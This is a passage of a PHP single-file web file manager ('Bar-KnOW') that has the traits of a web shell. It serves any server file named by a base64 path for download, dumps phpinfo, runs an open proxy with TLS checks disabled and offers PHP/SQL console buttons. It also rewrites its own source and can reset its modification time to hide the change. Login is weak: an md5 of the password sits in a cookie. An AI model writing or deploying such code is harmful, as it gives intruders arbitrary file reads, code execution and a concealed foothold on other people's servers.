	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg==");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name,$value) {
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>';
}

function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];
}

function fm_url($full=false) {
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);
}

function fm_home($full=false){
	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function fm_run_input($lng) {
	global $fm_config;
	$return = !empty($fm_config['enable_'.$lng.'_console']) ? 
	'
				<form  method="post" action="'.fm_url().'" style="display:inline">
				<input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">
				</form>
' : '';
	return $return;
}

function fm_url_proxy($matches) {
	$link = str_replace('&amp;','&',$matches[2]);
	$url = isset($_GET['url'])?$_GET['url']:'';
	$parse_url = parse_url($url);
	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';
	if (substr($link,0,2)=='//') {
		$link = substr_replace($link,fm_protocol(),0,2);
	} elseif (substr($link,0,1)=='/') {
		$link = substr_replace($link,$host,0,1);	
	} elseif (substr($link,0,2)=='./') {
		$link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)=='http') {
		//alles machen wunderschon
	} else {
		$link = $host.$link;
	} 
	if ($matches[1]=='href' && !strripos($link, 'css')) {
		$base = fm_site_url().'/'.basename(__FILE__);
		$baseq = $base.'?proxy=true&url=';
		$link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){
		//как-то тоже подменять надо
	}
	return $matches[1].'="'.$link.'"';
}
 
function fm_tpl_form($lng_tpl) {
	global ${$lng_tpl.'_templates'};
	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	$str = '';
	foreach ($tpl_arr as $ktpl=>$vtpl) {
		$str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';
	}
return '
<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>
</form>
</table>
';
}

function find_text_in_files($dir, $mask, $text) {
    $results = array();
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != "." && $entry != "..") {
                $path = $dir . "/" . $entry;
                if (is_dir($path)) {
                    $results = array_merge($results, find_text_in_files($path, $mask, $text));
                } else {
                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path);
                        if (strpos($contents, $text) !== false) {
                            $results[] = str_replace('//', '/', $path);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $results;
}


/* End Functions */

// authorization
if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])){
		if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) {
		echo '
';  
die();
	}
	if (isset($_POST['quit'])) {
		unset($_COOKIE[$auth['cookie_name']]);
		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
	}
}

// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) { 
		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: '.fm_url().'?fm_settings=true');
		exit(0);
	}	elseif (isset($_POST['fm_config'])) { 
		$fm_config = $_POST['fm_config'];
		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msg_ntimes = __('Settings').' '.__('done');
	}	elseif (isset($_POST['fm_login'])) { 
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents(__FILE__);
		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg_ntimes .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msg_ntimes .= ' '.__('Login').': '.$_POST['fm_login']['login'];
				if ($_POST['fm_login']['password'] != $auth['password']) $msg_ntimes .= ' '.__('Password').': '.$_POST['fm_login']['password'];
				$auth = $_POST['fm_login'];
			}
			else $msg_ntimes .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) { 
		$lng_tpl = $_POST['tpl_edited'];
		if (!empty($_POST[$lng_tpl.'_name'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents(__FILE__);
			$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl.'_templates'} = $fm_php;
					$msg_ntimes .= __('File updated');
				} else $msg_ntimes .= __('Error occurred');
				if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
			}	
		} else $msg_ntimes .= __('Error occurred');
	}
}

// Just show image
if (isset($_GET['img'])) {
	$file=base64_decode($_GET['img']);
	if ($info=getimagesize($file)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext='gif'; break;
			case 2: $ext='jpeg'; break;
			case 3: $ext='png'; break;
			case 6: $ext='bmp'; break;
			default: die();
		}
		header("Content-type: image/$ext");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET['download'])) {
	$file=base64_decode($_GET['download']);
	fm_download($file);	
}

// Just show info
if (isset($_GET['phpinfo'])) {
	phpinfo(); 
	die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url'])?urldecode($_GET['url']):'';
	$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	<input type="submit" value="'.__('Show').'" class="fm_input">
	</form>
</div>
';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
		echo $result;
		die();
	} 
}
?>
<!doctype html>
<html>
<head>     
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Bar-KnOW</title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt 'Courier New', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url("data:image/png;base64,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");
}

.file {
    background-image: url("data:image/png;base64,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